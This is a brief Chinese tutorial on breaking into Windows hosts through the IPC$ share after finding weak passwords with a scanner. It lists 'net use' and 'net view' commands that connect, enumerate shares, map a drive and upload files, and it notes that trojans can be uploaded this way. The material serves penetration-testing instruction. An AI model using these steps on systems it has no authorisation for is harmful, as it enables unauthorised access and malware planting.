ipc$漏洞利用实例

时间:2023-02-02 09:10:44

一、什么是IPC$

IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,

通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,

从而实现对远程计算机的访问。

二、如何发现系统是否存在该漏洞

本例中所讲的IPC$漏洞缘起弱口令漏洞,使用一些弱口令扫描工具即可发现IPC$连接是否存在弱口令,例如使用Hscan工具发现弱口令问题

ipc$漏洞利用实例

三、如何利用IPC$漏洞入侵

 1.建立连接

net use \\192.168.*.*\ipc$ "密码" /user:"用户名" 

ipc$漏洞利用实例

 2.删除链接

net use \\192.168.*.*\ipc$ /del

ipc$漏洞利用实例

 3.查看目标主机是否存在共享资源

net view \\192.168.*.*

ipc$漏洞利用实例

 4.映射远程共享资源到本地,本例中意为将远程主机192.168.*.*的共享资源share映射到本地的z盘

net use z: \\192.168.*.*\share 

ipc$漏洞利用实例

  查看系统盘符z是否已建立

ipc$漏洞利用实例

 5.上传文件至该共享资源中(实际的渗透测试中可上传木马等恶意文件)

ipc$漏洞利用实例

 查看是否已经复制成功

ipc$漏洞利用实例

详细命令以及说明请戳这里